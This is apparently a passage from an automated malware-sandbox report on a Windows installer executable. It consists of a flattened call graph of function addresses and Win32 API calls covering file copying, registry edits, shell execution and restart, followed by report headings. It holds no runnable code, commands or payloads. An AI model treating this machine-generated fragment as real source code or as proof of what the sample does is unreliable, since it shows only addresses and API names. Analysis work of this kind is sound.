3906->3907 3908 4020a6 3907->3908 3909 4020ba CoCreateInstance 3908->3909 3910 402a85 17 API calls 3908->3910 3913 4020d9 3909->3913 3914 402199 3909->3914 3910->3909 3911 401423 24 API calls 3912 4021bf 3911->3912 3913->3914 3915 40216e MultiByteToWideChar 3913->3915 3914->3911 3914->3912 3915->3914 3916 402678 3917 40267b 3916->3917 3918 402693 3916->3918 3919 402688 FindNextFileA 3917->3919 3919->3918 3920 4026d2 3919->3920 3922 405af4 lstrcpynA 3920->3922 3922->3918 3923 401bf8 3924 402a85 17 API calls 3923->3924 3925 401bff 3924->3925 3926 402a85 17 API calls 3925->3926 3927 401c09 3926->3927 3928 401c36 3927->3928 3929 401c7a 3927->3929 3931 402a68 17 API calls 3928->3931 3930 402a85 17 API calls 3929->3930 3932 401c7f 3930->3932 3933 401c3b 3931->3933 3934 402a85 17 API calls 3932->3934 3935 402a68 17 API calls 3933->3935 3936 401c88 FindWindowExA 3934->3936 3937 401c44 3935->3937 3940 401ca6 3936->3940 3938 401c6a SendMessageA 3937->3938 3939 401c4c SendMessageTimeoutA 3937->3939 3938->3940 3939->3940 3192 4032fa #17 OleInitialize SHGetFileInfoA 3260 405af4 lstrcpynA 3192->3260 3194 403351 GetCommandLineA 3261 405af4 lstrcpynA 3194->3261 3196 403363 GetModuleHandleA 3197 40337a 3196->3197 3198 405612 CharNextA 3197->3198 3199 40338e CharNextA 3198->3199 3210 40339b 3199->3210 3200 403404 3201 403417 GetTempPathA 3200->3201 3262 4032c6 3201->3262 3203 40342d 3205 403451 DeleteFileA 3203->3205 3206 403431 GetWindowsDirectoryA lstrcatA 3203->3206 3204 405612 CharNextA 3204->3210 3270 402c7d GetTickCount GetModuleFileNameA 3205->3270 3207 4032c6 11 API calls 3206->3207 3209 40344d 3207->3209 3209->3205 3213 4034cf ExitProcess OleUninitialize 3209->3213 3210->3200 3210->3204 3211 403406 3210->3211 3356 405af4 lstrcpynA 3211->3356 3212 403462 3212->3213 3217 405612 CharNextA 3212->3217 3250 4034bb 3212->3250 3215 4034e4 3213->3215 3219 4035c9 3213->3219 3359 4053c2 3215->3359 3223 403479 3217->3223 3220 40364c ExitProcess 3219->3220 3221 405dda 3 API calls 3219->3221 3226 4035d8 3221->3226 3229 403496 3223->3229 3230 4034fa lstrcatA lstrcmpiA 3223->3230 3227 405dda 3 API calls 3226->3227 3228 4035e1 3227->3228 3231 405dda 3 API calls 3228->3231 3233 4056c8 20 API calls 3229->3233 3230->3213 3232 403516 CreateDirectoryA SetCurrentDirectoryA 3230->3232 3234 4035ea 3231->3234 3235 403538 3232->3235 3236 40352d 3232->3236 3237 4034a1 3233->3237 3238 403638 ExitWindowsEx 3234->3238 3244 4035f8 GetCurrentProcess 3234->3244 3364 405af4 lstrcpynA 3235->3364 3363 405af4 lstrcpynA 3236->3363 3237->3213 3357 405af4 lstrcpynA 3237->3357 3238->3220 3241 403645 3238->3241 3243 40140b 2 API calls 3241->3243 3243->3220 3249 403608 3244->3249 3245 4034b0 3358 405af4 lstrcpynA 3245->3358 3247 405b16 17 API calls 3248 403568 DeleteFileA 3247->3248 3251 403575 CopyFileA 3248->3251 3257 403546 3248->3257 3249->3238 3302 4036a1 3250->3302 3251->3257 3252 4035bd 3254 405842 37 API calls 3252->3254 3253 405842 37 API calls 3253->3257 3255 4035c4 3254->3255 3255->3213 3256 405b16 17 API calls 3256->3257 3257->3247 3257->3252 3257->3253 3257->3256 3258 405361 2 API calls 3257->3258 3259 4035a9 CloseHandle 3257->3259 3258->3257 3259->3257 3260->3194 3261->3196 3263 405d03 5 API calls 3262->3263 3265 4032d2 3263->3265 3264 4032dc 3264->3203 3265->3264 3266 4055e7 3 API calls 3265->3266 3267 4032e4 CreateDirectoryA 3266->3267 3365 4057fa 3267->3365 3369 4057cb GetFileAttributesA CreateFileA 3270->3369 3272 402cc1 3300 402cce 3272->3300 3370 405af4 lstrcpynA 3272->3370 3274 402ce4 3275 40562e 2 API calls 3274->3275 3276 402cea 3275->3276 3371 405af4 lstrcpynA 3276->3371 3278 402cf5 GetFileSize 3279 402e45 3278->3279 3301 402d0c 3278->3301 3280 402e80 GlobalAlloc 3279->3280 3279->3300 3390 4032af SetFilePointer 3279->3390 3283 402e97 3280->3283 3287 4057fa 2 API calls 3283->3287 3284 402e61 3286 40327d ReadFile 3284->3286 3285 402ed8 3288 402edd DestroyWindow 3285->3288 3285->3300 3289 402e6c 3286->3289 3290 402ea8 CreateFileA 3287->3290 3288->3300 3289->3280 3289->3300 3292 402ee8 3290->3292 3290->3300 3291 402de7 GetTickCount 3295 402df2 CreateDialogParamA 3291->3295 3291->3301 3374 4032af SetFilePointer 3292->3374 3294 405e13 2 API calls 3294->3301 3295->3301 3296 402e37 3296->3279 3298 402e3c DestroyWindow 3296->3298 3297 402ef6 3375 402f71 3297->3375 3298->3279 3300->3212 3301->3285 3301->3291 3301->3294 3301->3296 3301->3300 3372 40327d ReadFile 3301->3372 3303 405dda 3 API calls 3302->3303 3304 4036b5 3303->3304 3305 4036bb 3304->3305 3306 4036cd 3304->3306 3423 405a52 wsprintfA 3305->3423 3307 4059db 3 API calls 3306->3307 3308 4036ee 3307->3308 3309 40370c lstrcatA 3308->3309 3311 4059db 3 API calls 3308->3311 3312 4036cb 3309->3312 3311->3309 3414 403955 3312->3414 3315 4056c8 20 API calls 3316 403734 3315->3316 3317 4037bd 3316->3317 3319 4059db 3 API calls 3316->3319 3318 4056c8 20 API calls 3317->3318 3320 4037c3 3318->3320 3321 403760 3319->3321 3322 4037d3 LoadImageA 3320->3322 3325 405b16 17 API calls 3320->3325 3321->3317 3328 40377c lstrlenA 3321->3328 3332 405612 CharNextA 3321->3332 3323 403887 3322->3323 3324 4037fe RegisterClassA 3322->3324 3327 40140b 2 API calls 3323->3327 3326 40383a SystemParametersInfoA CreateWindowExA 3324->3326 3355 4034cb 3324->3355 3325->3322 3326->3323 3331 40388d 3327->3331 3329 4037b0 3328->3329 3330 40378a lstrcmpiA 3328->3330 3334 4055e7 3 API calls 3329->3334 3330->3329 3333 40379a GetFileAttributesA 3330->3333 3337 403955 18 API calls 3331->3337 3331->3355 3335 40377a 3332->3335 3336 4037a6 3333->3336 3338 4037b6 3334->3338 3335->3328 3336->3329 3339 40562e 2 API calls 3336->3339 3340 40389e 3337->3340 3424 405af4 lstrcpynA 3338->3424 3339->3329 3342 403922 3340->3342 3343 4038a6 ShowWindow LoadLibraryA 3340->3343 3425 404f71 OleInitialize 3342->3425 3345 4038c5 LoadLibraryA 3343->3345 3346 4038cc GetClassInfoA 3343->3346 3345->3346 3348 4038e0 GetClassInfoA RegisterClassA 3346->3348 3349 4038f6 DialogBoxParamA 3346->3349 3347 403928 3350 403944 3347->3350 3351 40392c 3347->3351 3348->3349 3352 40140b 2 API calls 3349->3352 3353 40140b 2 API calls 3350->3353 3354 40140b 2 API calls 3351->3354 3351->3355 3352->3355 3353->3355 3354->3355 3355->3213 3356->3201 3357->3245 3358->3250 3360 4053d7 3359->3360 3361 4034f2 ExitProcess 3360->3361 3362 4053eb MessageBoxIndirectA 3360->3362 3362->3361 3363->3235 3364->3257 3366 405805 GetTickCount GetTempFileNameA 3365->3366 3367 405831 3366->3367 3368 4032f8 3366->3368 3367->3366 3367->3368 3368->3203 3369->3272 3370->3274 3371->3278 3373 40329e 3372->3373 3373->3301 3374->3297 3376 402f82 SetFilePointer 3375->3376 3377 402f9e 3375->3377 3376->3377 3391 40309c GetTickCount 3377->3391 3380 402faf ReadFile 3381 402fcf 3380->3381 3386 40305b 3380->3386 3382 40309c 16 API calls 3381->3382 3381->3386 3383 402fe6 3382->3383 3384 403061 ReadFile 3383->3384 3383->3386 3389 402ff6 3383->3389 3384->3386 3386->3300 3387 403011 ReadFile 3387->3386 3387->3389 3388 40302a WriteFile 3388->3386 3388->3389 3389->3386 3389->3387 3389->3388 3390->3284 3392 4030ce 3391->3392 3399 402fa7 3391->3399 3406 4032af SetFilePointer 3392->3406 3394 4030d9 SetFilePointer 3397 4030f9 3394->3397 3395 40327d ReadFile 3395->3397 3397->3395 3398 40316d GetTickCount 3397->3398 3397->3399 3400 405e13 2 API calls 3397->3400 3402 4031d5 WriteFile 3397->3402 3403 40322c SetFilePointer 3397->3403 3407 405ed4 3397->3407 3398->3397 3401 403177 CreateDialogParamA 3398->3401 3399->3380 3399->3386 3400->3397 3401->3397 3402->3397 3402->3399 3404 40324b 3403->3404 3404->3399 3405 403253 SendMessageA DestroyWindow 3404->3405 3405->3399 3406->3394 3408 405ef9 3407->3408 3409 405f01 3407->3409 3408->3397 3409->3408 3410 405f91 GlobalAlloc 3409->3410 3411 405f88 GlobalFree 3409->3411 3412 406008 GlobalAlloc 3409->3412 3413 405fff GlobalFree 3409->3413 3410->3408 3410->3409 3411->3410 3412->3408 3412->3409 3413->3412 3415 403969 3414->3415 3432 405a52 wsprintfA 3415->3432 3417 4039da 3418 405b16 17 API calls 3417->3418 3419 4039e6 SetWindowTextA 3418->3419 3420 403a02 3419->3420 3421 40371c 3419->3421 3420->3421 3422 405b16 17 API calls 3420->3422 3421->3315 3422->3420 3423->3312 3424->3317 3426 403f41 SendMessageA 3425->3426 3427 404f94 3426->3427 3430 401389 2 API calls 3427->3430 3431 404fbb 3427->3431 3428 403f41 SendMessageA 3429 404fcd OleUninitialize 3428->3429 3429->3347 3430->3427 3431->3428 3432->3417 3461 40177f 3462 402a85 17 API calls 3461->3462 3463 401786 3462->3463 3464 4017a4 3463->3464 3465 4017ac 3463->3465 3500 405af4 lstrcpynA 3464->3500 3501 405af4 lstrcpynA 3465->3501 3468 4017aa 3472 405d03 5 API calls 3468->3472 3469 4017b7 3470 4055e7 3 API calls 3469->3470 3471 4017bd lstrcatA 3470->3471 3471->3468 3478 4017c9 3472->3478 3473 405d9c 4 API calls 3473->3478 3474 4057ac 2 API calls 3474->3478 3476 4017e0 CompareFileTime 3476->3478 3477 4018a4 3479 404e9f 24 API calls 3477->3479 3478->3473 3478->3474 3478->3476 3478->3477 3481 405af4 lstrcpynA 3478->3481 3488 405b16 17 API calls 3478->3488 3494 4053c2 MessageBoxIndirectA 3478->3494 3497 40187b 3478->3497 3499 4057cb GetFileAttributesA CreateFileA 3478->3499 3482 4018ae 3479->3482 3480 404e9f 24 API calls 3483 401890 3480->3483 3481->3478 3484 402f71 21 API calls 3482->3484 3485 4018c1 3484->3485 3486 4018d5 SetFileTime 3485->3486 3487 4018e7 FindCloseChangeNotification 3485->3487 3486->3487 3487->3483 3489 4018f8 3487->3489 3488->3478 3490 401910 3489->3490 3491 4018fd 3489->3491 3493 405b16 17 API calls 3490->3493 3492 405b16 17 API calls 3491->3492 3495 401905 lstrcatA 3492->3495 3496 401918 3493->3496 3494->3478 3495->3496 3498 4053c2 MessageBoxIndirectA 3496->3498 3497->3480 3497->3483 3498->3483 3499->3478 3500->3468 3501->3469 3941 40197f 3942 402a68 17 API calls 3941->3942 3943 401986 3942->3943 3944 402a68 17 API calls 3943->3944 3945 401990 3944->3945 3946 402a85 17 API calls 3945->3946 3947 401999 3946->3947 3948 4019ac lstrlenA 3947->3948 3953 4019e7 3947->3953 3949 4019b6 3948->3949 3949->3953 3954 405af4 lstrcpynA 3949->3954 3951 4019d0 3952 4019dd lstrlenA 3951->3952 3951->3953 3952->3953 3954->3951 3955 4024ff 3956 402a85 17 API calls 3955->3956 3957 402506 3956->3957 3960 4057cb GetFileAttributesA CreateFileA 3957->3960 3959 402512 3960->3959 3961 401000 3962 401037 BeginPaint GetClientRect 3961->3962 3965 40100c DefWindowProcA 3961->3965 3963 4010f3 3962->3963 3967 401073 CreateBrushIndirect FillRect DeleteObject 3963->3967 3968 4010fc 3963->3968 3966 401179 3965->3966 3967->3963 3969 401102 CreateFontIndirectA 3968->3969 3970 401167 EndPaint 3968->3970 3969->3970 3971 401112 6 API calls 3969->3971 3970->3966 3971->3970 3972 401a00 3973 402a85 17 API calls 3972->3973 3974 401a07 3973->3974 3975 402a85 17 API calls 3974->3975 3976 401a10 3975->3976 3977 401a17 lstrcmpiA 3976->3977 3978 401a29 lstrcmpA 3976->3978 3979 401a1d 3977->3979 3978->3979 3980 401503 3981 402a68 17 API calls 3980->3981 3983 401509 Sleep 3981->3983 3984 40291a 3983->3984 3985 406083 3986 405f07 3985->3986 3987 406872 3986->3987 3988 405f91 GlobalAlloc 3986->3988 3989 405f88 GlobalFree 3986->3989 3990 406008 GlobalAlloc 3986->3990 3991 405fff GlobalFree 3986->3991 3988->3986 3988->3987 3989->3988 3990->3986 3990->3987 3991->3990 3992 402286 3993 402294 3992->3993 3994 40228e 3992->3994 3996 402a85 17 API calls 3993->3996 3998 4022a4 3993->3998 3995 402a85 17 API calls 3994->3995 3995->3993 3996->3998 3997 4022b2 4000 402a85 17 API calls 3997->4000 3998->3997 3999 402a85 17 API calls 3998->3999 3999->3997 4001 4022bb WritePrivateProfileStringA 4000->4001 4002 404009 lstrcpynA lstrlenA 4003 40230a 4004 40233a 4003->4004 4005 40230f 4003->4005 4007 402a85 17 API calls 4004->4007 4014 402b8f 4005->4014 4009 402341 4007->4009 4008 402316 4010 402a85 17 API calls 4008->4010 4013 402357 4008->4013 4018 402ac5 RegOpenKeyExA 4009->4018 4011 402327 RegDeleteValueA RegCloseKey 4010->4011 4011->4013 4015 402a85 17 API calls 4014->4015 4016 402ba8 4015->4016 4017 402bb6 RegOpenKeyExA 4016->4017 4017->4008 4019 402b3c 4018->4019 4022 402af0 4018->4022 4019->4013 4020 402b16 RegEnumKeyA 4021 402b28 RegCloseKey 4020->4021 4020->4022 4024 405dda 3 API calls 4021->4024 4022->4020 4022->4021 4023 402b4d RegCloseKey 4022->4023 4025 402ac5 3 API calls 4022->4025 4023->4019 4026 402b38 4024->4026 4025->4022 4026->4019 4027 402b68 RegDeleteKeyA 4026->4027 4027->4019 4028 40248a 4029 402b8f 18 API calls 4028->4029 4030 402494 4029->4030 4031 402a68 17 API calls 4030->4031 4032 40249d 4031->4032 4033 4024c0 RegEnumValueA 4032->4033 4034 4024b4 RegEnumKeyA 4032->4034 4035 4026bf 4032->4035 4033->4035 4036 4024d9 RegCloseKey 4033->4036 4034->4036 4036->4035 4038 40280c 4039 402a68 17 API calls 4038->4039 4040 402812 4039->4040 4041 402836 4040->4041 4042 40284d 4040->4042 4048 4026bf 4040->4048 4043 40284a 4041->4043 4044 40283b 4041->4044 4045 402863 4042->4045 4046 402857 4042->4046 4053 405a52 wsprintfA 4043->4053 4052 405af4 lstrcpynA 4044->4052 4047 405b16 17 API calls 4045->4047 4049 402a68 17 API calls 4046->4049 4047->4048 4049->4048 4052->4048 4053->4048 4061 401d0e GetDlgItem GetClientRect 4062 402a85 17 API calls 4061->4062 4063 401d3e LoadImageA SendMessageA 4062->4063 4064 40291a 4063->4064 4065 401d5c DeleteObject 4063->4065 4065->4064 4066 401e0e 4067 402a85 17 API calls 4066->4067 4068 401e14 4067->4068 4069 402a85 17 API calls 4068->4069 4070 401e1d 4069->4070 4071 402a85 17 API calls 4070->4071 4072 401e26 wsprintfA 4071->4072 4073 401423 24 API calls 4072->4073 4074 401e44 ShellExecuteA 4073->4074 4075 401e71 4074->4075 4076 401490 4077 404e9f 24 API calls 4076->4077 4078 401497 4077->4078 4079 402412 4080 402b8f 18 API calls 4079->4080 4081 40241c 4080->4081 4082 402a85 17 API calls 4081->4082 4083 402425 4082->4083 4084 4026bf 4083->4084 4085 40242f RegQueryValueExA 4083->4085 4086 40244f 4085->4086 4087 402455 RegCloseKey 4085->4087 4086->4087 4090 405a52 wsprintfA 4086->4090 4087->4084 4090->4087 4091 402892 4092 402a68 17 API calls 4091->4092 4093 402898 4092->4093 4094 4028c9 4093->4094 4095 4026bf 4093->4095 4097 4028a6 4093->4097 4094->4095 4096 405b16 17 API calls 4094->4096 4096->4095 4097->4095 4099 405a52 wsprintfA 4097->4099 4099->4095 4100 40151d SetForegroundWindow 4101 40291a 4100->4101 4102 40149d 4103 4014ab PostQuitMessage 4102->4103 4104 402271 4102->4104 4103->4104 4105 40159d 4106 402a85 17 API calls 4105->4106 4107 4015a4 SetFileAttributesA 4106->4107 4108 4015b6 4107->4108 4109 401f20 4110 402a85 17 API calls 4109->4110 4111 401f27 GetFileVersionInfoSizeA 4110->4111 4112 401f4a GlobalAlloc 4111->4112 4113 401fa0 4111->4113 4112->4113 4114 401f5e GetFileVersionInfoA 4112->4114 4114->4113 4115 401f6f VerQueryValueA 4114->4115 4115->4113 4116 401f88 4115->4116 4120 405a52 wsprintfA 4116->4120 4118 401f94 4121 405a52 wsprintfA 4118->4121 4120->4118 4121->4113 4122 402521 4123 402526 4122->4123 4124 402537 4122->4124 4125 402a68 17 API calls 4123->4125 4126 402a85 17 API calls 4124->4126 4129 40252d 4125->4129 4127 40253e lstrlenA 4126->4127 4127->4129 4128 4026bf 4129->4128 4130 40255d WriteFile 4129->4130 4130->4128 4131 4026a1 4132 402a85 17 API calls 4131->4132 4133 4026a8 FindFirstFileA 4132->4133 4134 4026cb 4133->4134 4138 4026bb 4133->4138 4135 4026d2 4134->4135 4139 405a52 wsprintfA 4134->4139 4140 405af4 lstrcpynA 4135->4140 4139->4135 4140->4138 2880 403a22 2881 403b75 2880->2881 2882 403a3a 2880->2882 2884 403bc6 2881->2884 2885 403b86 GetDlgItem GetDlgItem 2881->2885 2882->2881 2883 403a46 2882->2883 2886 403a51 SetWindowPos 2883->2886 2887 403a64 2883->2887 2889 403c20 2884->2889 2979 401389 2884->2979 2953 403ef5 2885->2953 2886->2887 2890 403a81 2887->2890 2891 403a69 ShowWindow 2887->2891 2898 403b70 2889->2898 2959 403f41 2889->2959 2894 403aa3 2890->2894 2895 403a89 DestroyWindow 2890->2895 2891->2890 2892 403bb0 KiUserCallbackDispatcher 2956 40140b 2892->2956 2900 403aa8 SetWindowLongA 2894->2900 2901 403ab9 2894->2901 2899 403e9f 2895->2899 2899->2898 2908 403eaf ShowWindow 2899->2908 2900->2898 2905 403b62 2901->2905 2906 403ac5 GetDlgItem 2901->2906 2903 40140b 2 API calls 2921 403c32 2903->2921 2904 403e80 DestroyWindow EndDialog 2904->2899 2965 403f5c 2905->2965 2909 403af5 2906->2909 2910 403ad8 SendMessageA IsWindowEnabled 2906->2910 2907 403bfc SendMessageA 2907->2898 2908->2898 2913 403b02 2909->2913 2914 403b15 2909->2914 2915 403b49 SendMessageA 2909->2915 2924 403afa 2909->2924 2910->2898 2910->2909 2913->2915 2913->2924 2918 403b32 2914->2918 2919 403b1d 2914->2919 2915->2905 2917 403ef5 18 API calls 2917->2921 2923 40140b 2 API calls 2918->2923 2922 40140b 2 API calls 2919->2922 2920 403b30 2920->2905 2921->2903 2921->2904 2921->2917 2926 403ef5 18 API calls 2921->2926 2983 405b16 2921->2983 2922->2924 2925 403b39 2923->2925 2962 403ece 2924->2962 2925->2905 2925->2924 2927 403cad GetDlgItem 2926->2927 2928 403cc2 2927->2928 2929 403cca ShowWindow EnableWindow 2927->2929 2928->2929 3000 403f17 EnableWindow 2929->3000 2931 403cf4 EnableWindow 2934 403d08 2931->2934 2932 403d0d GetSystemMenu EnableMenuItem SendMessageA 2933 403d3d SendMessageA 2932->2933 2932->2934 2933->2934 2934->2932 3001 403f2a SendMessageA 2934->3001 3002 405af4 lstrcpynA 2934->3002 2937 403d6b lstrlenA 2938 405b16 17 API calls 2937->2938 2939 403d7c SetWindowTextA 2938->2939 2940 401389 2 API calls 2939->2940 2942 403d8d 2940->2942 2941 403dc0 DestroyWindow 2941->2899 2943 403dda CreateDialogParamA 2941->2943 2942->2898 2942->2921 2942->2941 2944 403dbb 2942->2944 2943->2899 2945 403e0d 2943->2945 2944->2898 2946 403ef5 18 API calls 2945->2946 2947 403e18 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2946->2947 2948 401389 2 API calls 2947->2948 2949 403e5e 2948->2949 2949->2898 2950 403e66 ShowWindow 2949->2950 2951 403f41 SendMessageA 2950->2951 2952 403e7e 2951->2952 2952->2899 2954 405b16 17 API calls 2953->2954 2955 403f00 SetDlgItemTextA 2954->2955 2955->2892 2957 401389 2 API calls 2956->2957 2958 401420 2957->2958 2958->2884 2960 403f59 2959->2960 2961 403f4a SendMessageA 2959->2961 2960->2921 2961->2960 2963 403ed5 2962->2963 2964 403edb SendMessageA 2962->2964 2963->2964 2964->2920 2966 403ffd 2965->2966 2967 403f74 GetWindowLongA 2965->2967 2966->2898 2967->2966 2968 403f85 2967->2968 2969 403f94 GetSysColor 2968->2969 2970 403f97 2968->2970 2969->2970 2971 403fa7 SetBkMode 2970->2971 2972 403f9d SetTextColor 2970->2972 2973 403fc5 2971->2973 2974 403fbf GetSysColor 2971->2974 2972->2971 2975 403fd6 2973->2975 2976 403fcc SetBkColor 2973->2976 2974->2973 2975->2966 2977 403ff0 CreateBrushIndirect 2975->2977 2978 403fe9 DeleteObject 2975->2978 2976->2975 2977->2966 2978->2977 2980 401390 2979->2980 2981 4013fe 2980->2981 2982 4013cb MulDiv SendMessageA 2980->2982 2981->2889 2981->2907 2982->2980 2999 405b26 2983->2999 2984 405cea 2985 405cff 2984->2985 3019 405af4 lstrcpynA 2984->3019 2985->2921 2987 405cc1 lstrlenA 2987->2999 2989 405bfe GetSystemDirectoryA 2989->2999 2991 405b16 10 API calls 2991->2987 2993 405c11 GetWindowsDirectoryA 2993->2999 2994 405c21 SHGetSpecialFolderLocation 2995 405c3a SHGetPathFromIDListA CoTaskMemFree 2994->2995 2994->2999 2995->2999 2996 405c68 lstrcatA 2996->2999 2998 405b16 10 API calls 2998->2999 2999->2984 2999->2987 2999->2989 2999->2991 2999->2993 2999->2994 2999->2996 2999->2998 3003 4059db RegOpenKeyExA 2999->3003 3008 405d03 2999->3008 3017 405a52 wsprintfA 2999->3017 3018 405af4 lstrcpynA 2999->3018 3000->2931 3001->2934 3002->2937 3004 405a4c 3003->3004 3005 405a0e RegQueryValueExA 3003->3005 3004->2999 3006 405a2f RegCloseKey 3005->3006 3006->3004 3015 405d0f 3008->3015 3009 405d77 3010 405d7b CharPrevA 3009->3010 3013 405d96 3009->3013 3010->3009 3011 405d6c CharNextA 3011->3009 3011->3015 3013->2999 3014 405d5a CharNextA 3014->3015 3015->3009 3015->3011 3015->3014 3016 405d67 CharNextA 3015->3016 3020 405612 3015->3020 3016->3011 3017->2999 3018->2999 3019->2985 3021 405618 3020->3021 3022 40562b 3021->3022 3023 40561e CharNextA 3021->3023 3022->3015 3023->3021 4148 401923 4149 40195a 4148->4149 4150 402a85 17 API calls 4149->4150 4151 40195f 4150->4151 4152 405426 69 API calls 4151->4152 4153 401968 4152->4153 4159 404626 4160 404652 4159->4160 4161 404636 4159->4161 4162 404685 4160->4162 4163 404658 SHGetPathFromIDListA 4160->4163 4170 4053a6 GetDlgItemTextA 4161->4170 4165 40466f SendMessageA 4163->4165 4166 404668 4163->4166 4165->4162 4168 40140b 2 API calls 4166->4168 4167 404643 SendMessageA 4167->4160 4168->4165 4170->4167 4171 401926 4172 402a85 17 API calls 4171->4172 4173 40192d 4172->4173 4174 4053c2 MessageBoxIndirectA 4173->4174 4175 401936 4174->4175 4176 40152b 4177 402a68 17 API calls 4176->4177 4178 401532 4177->4178 4179 401fab SetErrorMode 4180 402061 4179->4180 4181 401fc8 4179->4181 4183 401423 24 API calls 4180->4183 4182 402a85 17 API calls 4181->4182 4184 401fcf 4182->4184 4185 40206c SetErrorMode 4183->4185 4186 402a85 17 API calls 4184->4186 4187 40291a 4185->4187 4188 401fd7 4186->4188 4189 401fec LoadLibraryExA 4188->4189 4190 401fdf GetModuleHandleA 4188->4190 4189->4180 4191 401ffc GetProcAddress 4189->4191 4190->4189 4190->4191 4192 402049 4191->4192 4193 40200c 4191->4193 4194 404e9f 24 API calls 4192->4194 4195 401423 24 API calls 4193->4195 4196 40201c 4193->4196 4194->4196 4195->4196 4196->4185 4197 402058 FreeLibrary 4196->4197 4197->4185 4198 40262f 4199 402636 4198->4199 4201 4028c7 4198->4201 4200 402a68 17 API calls 4199->4200 4202 402641 4200->4202 4203 402648 SetFilePointer 4202->4203 4203->4201 4204 402658 4203->4204 4206 405a52 wsprintfA 4204->4206 4206->4201 4207 401b30 4208 402a85 17 API calls 4207->4208 4209 401b37 4208->4209 4210 402a68 17 API calls 4209->4210 4211 401b40 wsprintfA 4210->4211 4212 40291a 4211->4212 4213 401a31 4214 402a85 17 API calls 4213->4214 4215 401a3a ExpandEnvironmentStringsA 4214->4215 4216 401a4e 4215->4216 4218 401a61 4215->4218 4217 401a53 lstrcmpA 4216->4217 4216->4218 4217->4218 4219 404333 4220 404371 4219->4220 4221 404364 4219->4221 4222 40437a GetDlgItem 4220->4222 4229 4043dd 4220->4229 4276 4053a6 GetDlgItemTextA 4221->4276 4225 40438c 4222->4225 4224 40436b 4227 405d03 5 API calls 4224->4227 4228 4043a0 SetWindowTextA 4225->4228 4231 40567b 4 API calls 4225->4231 4226 4044bf 4274 40460b 4226->4274 4278 4053a6 GetDlgItemTextA 4226->4278 4227->4220 4233 403ef5 18 API calls 4228->4233 4229->4226 4234 405b16 17 API calls 4229->4234 4229->4274 4236 404396 4231->4236 4232 403f5c 8 API calls 4237 40461f 4232->4237 4238 4043c0 4233->4238 4239 404451 SHBrowseForFolderA 4234->4239 4235 4044ee 4240 4056c8 20 API calls 4235->4240 4236->4228 4244 4055e7 3 API calls 4236->4244 4241 403ef5 18 API calls 4238->4241 4239->4226 4242 404469 CoTaskMemFree 4239->4242 4243 4044f4 4240->4243 4245 4043d0 4241->4245 4246 4055e7 3 API calls 4242->4246 4279 405af4 lstrcpynA 4243->4279 4244->4228 4277 403f2a SendMessageA 4245->4277 4248 404476 4246->4248 4251 4044ad SetDlgItemTextA 4248->4251 4255 405b16 17 API calls 4248->4255 4250 4043d6 4253 405dda 3 API calls 4250->4253 4251->4226 4252 40450b 4254 40567b 4 API calls 4252->4254 4253->4229 4256 404511 4254->4256 4257 404495 lstrcmpiA 4255->4257 4259 405dda 3 API calls 4256->4259 4257->4251 4258 4044a6 lstrcatA 4257->4258 4258->4251 4260 40451f 4259->4260 4261 40454a GetDiskFreeSpaceA 4260->4261 4263 40453b 4260->4263 4262 404565 MulDiv 4261->4262 4261->4263 4262->4263 4264 4045ba 4263->4264 4265 40468c 20 API calls 4263->4265 4266 4045dd 4264->4266 4268 40140b 2 API calls 4264->4268 4267 4045ac 4265->4267 4280 403f17 EnableWindow 4266->4280 4270 4045b1 4267->4270 4271 4045bc SetDlgItemTextA 4267->4271 4268->4266 4273 40468c 20 API calls 4270->4273 4271->4264 4272 4045f9 4272->4274 4281 4042c8 4272->4281 4273->4264 4274->4232 4276->4224 4277->4250 4278->4235 4279->4252 4280->4272 4282 4042d6 4281->4282 4283 4042db SendMessageA 4281->4283 4282->4283 4283->4274 4284 4014b7 4285 4014bd 4284->4285 4286 401389 2 API calls 4285->4286 4287 4014c5 4286->4287 4302 401cba 4303 402a68 17 API calls 4302->4303 4304 401cc0 IsWindow 4303->4304 4305 401a21 4304->4305 3433 4015bb 3434 402a85 17 API calls 3433->3434 3435 4015c2 3434->3435 3436 40567b 4 API calls 3435->3436 3446 4015ca 3436->3446 3437 401612 3438 401635 3437->3438 3439 401617 3437->3439 3443 401423 24 API calls 3438->3443 3451 401423 3439->3451 3440 405612 CharNextA 3442 4015d8 CreateDirectoryA 3440->3442 3445 4015ed GetLastError 3442->3445 3442->3446 3450 4021bf 3443->3450 3445->3446 3447 4015fa GetFileAttributesA 3445->3447 3446->3437 3446->3440 3447->3446 3449 401629 SetCurrentDirectoryA 3449->3450 3452 404e9f 24 API calls 3451->3452 3453 401431 3452->3453 3454 405af4 lstrcpynA 3453->3454 3454->3449 4306 40163c 4307 402a85 17 API calls 4306->4307 4308 401642 4307->4308 4309 405d9c 4 API calls 4308->4309 4310 401648 4309->4310 4311 40403d 4312 404053 4311->4312 4317 404160 4311->4317 4315 403ef5 18 API calls 4312->4315 4313 4041cf 4314 4042a3 4313->4314 4316 4041d9 GetDlgItem 4313->4316 4322 403f5c 8 API calls 4314->4322 4318 4040a9 4315->4318 4319 404261 4316->4319 4320 4041ef 4316->4320 4317->4313 4317->4314 4321 4041a4 GetDlgItem SendMessageA 4317->4321 4323 403ef5 18 API calls 4318->4323 4319->4314 4325 404273 4319->4325 4320->4319 4324 404215 6 API calls 4320->4324 4342 403f17 EnableWindow 4321->4342 4327 40429e 4322->4327 4328 4040b6 CheckDlgButton 4323->4328 4324->4319 4329 404279 SendMessageA 4325->4329 4330 40428a 4325->4330 4340 403f17 EnableWindow 4328->4340 4329->4330 4330->4327 4333 404290 SendMessageA 4330->4333 4331 4041ca 4334 4042c8 SendMessageA 4331->4334 4333->4327 4334->4313 4335 4040d4 GetDlgItem 4341 403f2a SendMessageA 4335->4341 4337 4040ea SendMessageA 4338 404111 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4337->4338 4339 404108 GetSysColor 4337->4339 4338->4327 4339->4338 4340->4335 4341->4337 4342->4331

                Executed Functions

                Function 004032FA Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 265filestringcomCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
